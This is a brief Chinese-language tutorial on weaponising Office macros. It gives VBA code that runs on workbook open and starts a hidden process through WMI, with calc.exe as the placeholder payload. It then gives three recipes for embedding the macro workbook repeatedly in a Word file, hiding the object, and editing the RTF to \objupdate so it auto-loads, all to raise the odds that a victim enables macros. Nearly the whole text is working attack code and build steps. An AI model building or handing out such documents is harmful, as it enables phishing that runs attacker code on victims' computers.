0x00 office宏的利用
从walmartlabs学来的,让宏多弹几次,提高成功率。
创建方式1:
1、 创建一个包含宏的Excel,让这个Excel在开启宏的状态下,打开可以执行,保存为(xls 或者 xlsm )比如添加以下宏:1
Private Sub Workbook_Open()
Debugging
End Sub
Public Function Debugging() As Variant
Dim Str As String
Str = "calc.exe"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create Str, Null, objConfig, intProcessID
End Function
2、创建一个word文档,再插入处选择插入对象,然后选择插入对象->由文件创建->选择刚刚创建好的包含宏代码的Excel (不要点链接到文件和显示为图标!),想弹几次,就插几次。🤔
3、使用快捷键隐藏插入的对象,快捷键为”Ctrl+Shift+H”
4、将word文档另存为RTF格式
5、编辑RTF文档,修改\objemb 为\objupdate\objemb, 之后将rtf修改为doc。
创建方式2:
1-3、同上
4、将word文档另存为.docx格式,关闭再重新打开docx
5、将新的docx格式文件另存为rtf格式,之后修改rtf为doc。
创建方式3:
1、使用Excel 4.0 宏创建包含宏的Excel文件。
2-5、同上
效果
